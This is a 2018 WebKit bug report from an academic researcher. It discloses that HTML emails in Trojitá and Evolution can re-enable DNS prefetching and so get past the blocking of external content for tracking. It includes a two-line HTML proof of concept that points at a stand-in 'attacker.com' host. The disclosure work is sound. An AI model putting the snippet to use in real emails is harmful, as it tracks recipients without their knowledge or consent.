[Webkit-unassigned] [Bug 182924] New: Potential privacy issue: DNS prefetching can be re-enabled

Mon Feb 19 05:40:34 PST 2018

https://bugs.webkit.org/show_bug.cgi?id=182924

            Bug ID: 182924
           Summary: Potential privacy issue: DNS prefetching can be
                    re-enabled
           Product: WebKit
           Version: Other
          Hardware: Unspecified
                OS: Unspecified
            Status: NEW
          Severity: Normal
          Priority: P2
         Component: WebCore Misc.
          Assignee: webkit-unassigned at lists.webkit.org
          Reporter: jens.a.mueller+webkit at rub.de

In the scope of academic research we systematically analyzed various email clients for `web bugs' -- 1x1 pixel images in HTML emails used by spammers to track if their mails to a certain address are actually read. To respect the privacy of their customers most email clients, by default, block external content like images in HTML emails. This can be bypassed on Trojitá and Evolution by re-enabling DNS prefetching within the HTML email itself:

<meta http-equiv="x-dns-prefetch-control" content="on">
<a href="http://tracking-id.attacker.com"></a>

The related bug reports can be found here:

https://bugs.kde.org/show_bug.cgi?id=390452
https://bugzilla.gnome.org/show_bug.cgi?id=793449

Both mail clients use WebKit to render HTML emails, so it may actually be a WebKit issue and should be fixed here.

For the testing the mail clients we used Debian GNU/Linux 9.3 with:

- libwebkit2gtk-4.0-37:amd64 (version 2.16.6+0+deb9u1)
- libqt5webkit5:amd64 (version 5.7.1+dfsg-1)

-- 
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webkit.org/pipermail/webkit-unassigned/attachments/20180219/685fa8ee/attachment-0001.html>